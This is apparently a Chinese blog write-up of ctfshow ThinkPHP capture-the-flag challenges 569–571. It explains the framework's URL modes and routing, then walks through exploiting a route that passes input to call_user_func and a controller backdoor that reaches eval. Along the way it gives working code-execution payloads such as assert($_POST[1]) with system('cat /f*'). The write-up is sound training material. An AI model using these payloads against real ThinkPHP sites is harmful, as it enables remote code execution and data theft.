thinkphp 专题

thinkphp完全开发手册

https://www.kancloud.cn/manual/thinkphp/1678

569 pathinfo的运用

四种模式

1.普通模式也就是传统的GET传参方式来指定当前访问的模块和操作,例如: http://localhost/?m=home&c=user&a=login&var=value
m参数表示模块,c参数表示控制器,a参数表示操作(当然这些参数都是可以配置的),后面的表示其他GET参数。 

2.PATHINFO模式是系统的默认URL模式,提供了最好的SEO支持,系统内部已经做了环境的兼容处理,所以能够支持大多数的主机环境。对应上面的URL模式,PATHINFO模式下面的URL访问地址是: http://localhost/index.php/home/user/login/var/value/

3.REWRITE模式是在PATHINFO模式的基础上添加了重写规则的支持,可以去掉URL地址里面的入口文件index.php,但是需要额外配置WEB服务器的重写规则。接下来,就可以用下面的URL地址访问了: http://localhost/home/user/login/var/value

4.兼容模式是用于不支持PATHINFO的特殊环境,URL访问地址可以变成: http://localhost/?path=/home-user-login-var-value

payload:

url/index.php/Admin/Login/ctfshowLogin 

570 路由

路由规则的定义格式为: '路由表达式'=>'路由地址和传入参数'
或者:array('路由表达式','路由地址','传入参数')
匹配路由表达式从而达到****简化路径的作用
查看下载下来的config.php

<?php
return array(
    //'配置项'=>'配置值'
    'DB_TYPE'               =>  'mysql',     // 数据库类型
    'DB_HOST'               =>  '127.0.0.1', // 服务器地址
    'DB_NAME'               =>  'ctfshow',          // 数据库名
    'DB_USER'               =>  'root',      // 用户名
    'DB_PWD'                =>  'ctfshow',          // 密码
    'DB_PORT'               =>  '3306',        // 端口
    'URL_ROUTER_ON'   => true, 
    'URL_ROUTE_RULES' => array(
    'ctfshow/:f/:a' =>function($f,$a){
        call_user_func($f, $a);
        }
    )
);

存在ctfshow的路由
即URL为url/ctfshow/a/b 则会调用 call_user_func(a,b)

因为eval是一个语言结构而不是函数,所以这里是不能被call_user_func调用的,使用assert(system("ls"));尝试ls /时却不行,换下思路,
/ctfshow/assert/assert($_POST[1])
post: 1=system('cat /f*');

这里还有一个要注意的,那就是直接构造
/ctfshow/assert/$_POST[1]  是不行的,因为$_POST[1]不会被解析

571 控制器

查看下载的控制器文件

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    public function index($n=''){
        $this->show('<style type="text/css">*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} body{ background: #fff; font-family: "微软雅黑"; color: #333;font-size:24px} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.8em; font-size: 36px } a,a:hover{color:blue;}</style><div style="padding: 24px 48px;"> <h1>CTFshow</h1><p>thinkphp 专项训练</p><p>hello,'.$n.'黑客建立了控制器后门,你能找到吗</p>','utf-8');
    }

}

跟进show
 protected function show($content,$charset='',$contentType='',$prefix='') {
        $this->view->display('',$charset,$contentType,$content,$prefix);
    }

进入fetch
 // 页面缓存
        ob_start();
        ob_implicit_flush(0);
        if('php' == strtolower(C('TMPL_ENGINE_TYPE'))) { // 使用PHP原生模板
            $_content   =   $content;
            // 模板阵列变量分解成为独立变量
            extract($this->tVar, EXTR_OVERWRITE);
            // 直接载入PHP模板
            empty($_content)?include $templateFile:eval('?>'.$_content);
        }else{
            // 视图解析标签
            $params = array('var'=>$this->tVar,'file'=>$templateFile,'content'=>$content,'prefix'=>$prefix);
            Hook::listen('view_parse',$params);
        }

会直接eval('?>'.$_content);//可以进行命令执行

payload:

system("cat /flag*")
上一篇:Python操作DB2数据库


下一篇:【MSSQL】镜像维护